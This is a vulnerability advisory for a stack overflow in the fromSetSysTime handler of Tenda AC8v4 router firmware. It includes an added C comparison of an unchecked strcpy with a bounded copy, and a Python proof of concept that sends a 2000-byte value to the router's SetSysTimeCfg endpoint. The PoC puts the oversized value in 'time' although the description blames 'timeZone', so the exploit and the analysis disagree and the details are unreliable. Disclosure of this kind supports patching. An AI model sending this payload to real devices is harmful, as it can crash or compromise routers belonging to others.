Overview

Affected version

AC8v4 V16.03.34.09

Vulnerability details

The Tenda AC8v4 V16.03.34.09 firmware has a stack overflow vulnerability in the fromSetSysTime function. The v5 variable receives the timeType parameter from a POST request; when v5 equals "sync", the function sub_4A75C0 is executed.

The s variable receives the timeZone parameter from the POST request. Because the user controls timeZone, the statement strcpy((char *)v6, s); copies it without any length check: a timeZone value longer than the v6 array overflows the stack buffer, triggering this vulnerability.
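As an added illustration (not code from this report or from Tenda), the unbounded-copy pattern described above beside a bounds-checked replacement that refuses over-long input before any copy; the buffer size, function names and parameter handling are assumptions made for the example:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed stack buffer size; the real v6 size is not stated in the report. */
#define TIMEZONE_BUF 64

/* Vulnerable pattern as described: unbounded strcpy into a fixed stack buffer.
 * Shown for contrast only; never called with untrusted input here. */
int handle_set_sys_time_vulnerable(const char *time_type, const char *timezone_param)
{
    char v6[TIMEZONE_BUF];
    if (strcmp(time_type, "sync") != 0)
        return -1;
    strcpy(v6, timezone_param);          /* no length check: stack overflow */
    return (int)strlen(v6);
}

/* Hardened copy: reject instead of silently truncating. Returns 0 or -1. */
int set_timezone_checked(const char *timezone_param, char *out, size_t out_len)
{
    if (timezone_param == NULL || out_len == 0)
        return -1;
    size_t n = strlen(timezone_param);
    if (n >= out_len)                    /* keep room for the terminating NUL */
        return -1;
    memcpy(out, timezone_param, n + 1);
    return 0;
}

/* Hardened handler: same control flow, but the copy is bounded. Returns the
 * accepted value's length, or -1 if the request was refused. */
int handle_set_sys_time_hardened(const char *time_type, const char *timezone_param)
{
    char v6[TIMEZONE_BUF];
    if (time_type == NULL || strcmp(time_type, "sync") != 0)
        return -1;
    if (set_timezone_checked(timezone_param, v6, sizeof v6) != 0)
        return -1;                       /* overlong input never reaches v6 */
    return (int)strlen(v6);
}

/* Helper for testing: submit a constructed value of `len` 'a' characters. */
int submit_constructed_timezone(size_t len)
{
    char *buf = malloc(len + 1);
    if (buf == NULL)
        return -2;
    memset(buf, 'a', len);
    buf[len] = '\0';
    int rc = handle_set_sys_time_hardened("sync", buf);
    free(buf);
    return rc;
}
```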

POC

import requests

ip = "192.168.84.101"
url = "http://" + ip + "/goform/SetSysTimeCfg"
payload = b"a" * 2000  # oversized value that exceeds the stack buffer

data = {
    'timeType': 'sync',
    'time': payload,
}
response = requests.post(url, data=data)
print(response.text)